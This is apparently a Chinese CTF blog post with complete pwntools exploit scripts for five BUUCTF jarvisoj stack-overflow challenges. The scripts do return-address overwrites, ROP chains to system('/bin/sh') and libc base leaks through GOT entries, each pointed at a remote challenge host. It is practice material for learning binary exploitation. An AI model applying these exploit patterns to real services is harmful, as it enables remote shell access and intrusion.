BUUCTF jarvisoj exp整合

二次信任 提交于 2020-02-24 12:52:18

0x01 jarvisoj_level0

 简单的地址改写

from pwn import *

# Connection to the challenge instance; the commented-out line is the local variant.
io = remote('node3.buuoj.cn', 26882)
#io = process('./level0')

# Address written as a 64-bit little-endian word right after 0x88 bytes of padding.
TARGET = 0x0000000000400596

padding = 'a' * 0x88
payload = padding + p64(TARGET)
io.sendline(payload)

# Drop into pwntools interactive mode on the same connection.
io.interactive()

0x02 jarvisoj_level2

 简单rop，所需的地址可以直接在可执行文件中找到

from pwn import *

io = remote('node3.buuoj.cn', 26369)

# Both addresses are literals taken from the binary itself (see the caption above).
SYSTEM_ADDR = 0x08048320
BIN_SH_ADDR = 0x0804A024

# 0x8C bytes of padding, then three 32-bit words laid out as an x86 cdecl
# call frame: callee, return slot (0), first argument.
frame = p32(SYSTEM_ADDR) + p32(0) + p32(BIN_SH_ADDR)
io.sendline('a' * 0x8C + frame)

io.interactive()

0x03 jarvisoj_level2_x64

 上一题的64位版本

from pwn import *

# Verbose pwntools logging: every send/recv is echoed to the terminal.
context.log_level = 'debug'

io = remote('node3.buuoj.cn', 27014)
#io = process('./level2_x64')

# A local copy of the binary is needed only to resolve the PLT symbol;
# the other two addresses are literals.
binary = ELF('./level2_x64')
POP_RDI_RET = 0x00000000004006B3
STR_SH = 0x0000000000600A90
system_plt = binary.plt['system']

# Chain: gadget, its operand, then the PLT entry.
chain = p64(POP_RDI_RET) + p64(STR_SH) + p64(system_plt)

# Unlike the 32-bit script above, wait for the prompt before sending.
io.recvuntil('Input:\n')
io.sendline('a' * 0x88 + chain)

io.interactive()

0x04 jarvisoj_level3

 泄露libc基址,构造rop

from pwn import *
from LibcSearcher import *

#io = process('./level3')
io = remote('node3.buuoj.cn', 26763)
binary = ELF('level3')

# Placed in the return slot of stage 1 so the program prompts a second time.
VUL_ADDR = 0x0804844B
read_got = binary.got['read']
write_plt = binary.plt['write']
PAD = 'a' * 0x8C

# Stage 1: write(1, &read@got, 4), returning to VUL_ADDR afterwards.
stage1 = PAD + p32(write_plt) + p32(VUL_ADDR) + p32(1) + p32(read_got) + p32(4)
io.sendlineafter('Input:\n', stage1)

# NOTE(review): recv(4) is assumed to hand back all four bytes in one call.
leaked_read = u32(io.recv(4))

# LibcSearcher resolves offsets from the leaked symbol; dump() may prompt when
# several libc candidates match, so the call order is kept fixed.
libc = LibcSearcher('read', leaked_read)
base = leaked_read - libc.dump('read')
system_addr = base + libc.dump('system')
bin_sh_addr = base + libc.dump('str_bin_sh')

# Stage 2: same frame layout as the 32-bit level2 script.
stage2 = PAD + p32(system_addr) + p32(0) + p32(bin_sh_addr)
io.sendlineafter('Input:\n', stage2)

io.interactive()

0x05 jarvisoj_level3_x64

from pwn import *
from LibcSearcher import *
# Verbose pwntools logging: every send/recv is echoed to the terminal.
context.log_level = 'debug'

io = remote('node3.buuoj.cn', 26368)
binary = ELF('./level3_x64')

# Placed in the return slot of stage 1 so the program prompts a second time.
VUL_ADDR = 0x00000000004005E6
POP_RDI_RET = 0x00000000004006b3
POP_RSI_R15_RET = 0x00000000004006b1
write_got = binary.got['write']
write_plt = binary.plt['write']
PAD = 'a' * 0x88

# Stage 1: rsi = &write@got (r15 = 0 is a don't-care), rdi = 1, then write@plt.
stage1 = PAD
stage1 += p64(POP_RSI_R15_RET) + p64(write_got) + p64(0)
stage1 += p64(POP_RDI_RET) + p64(1)
stage1 += p64(write_plt) + p64(VUL_ADDR)
io.sendlineafter('Input:\n', stage1)

# Six bytes are read and zero-extended to a full 64-bit word.
# NOTE(review): recv(6) is assumed to hand back all six bytes in one call.
leaked_write = u64(io.recv(6).ljust(8, '\x00'))

# LibcSearcher resolves offsets from the leaked symbol; dump() may prompt when
# several libc candidates match, so the call order is kept fixed.
libc = LibcSearcher('write', leaked_write)
base = leaked_write - libc.dump('write')
system_addr = base + libc.dump('system')
bin_sh_addr = base + libc.dump('str_bin_sh')

# Stage 2: rdi = the string address, then system, returning to VUL_ADDR.
stage2 = PAD + p64(POP_RDI_RET) + p64(bin_sh_addr) + p64(system_addr) + p64(VUL_ADDR)
io.sendlineafter('Input:\n', stage2)

io.interactive()

随手关注一个,就是对我的支持

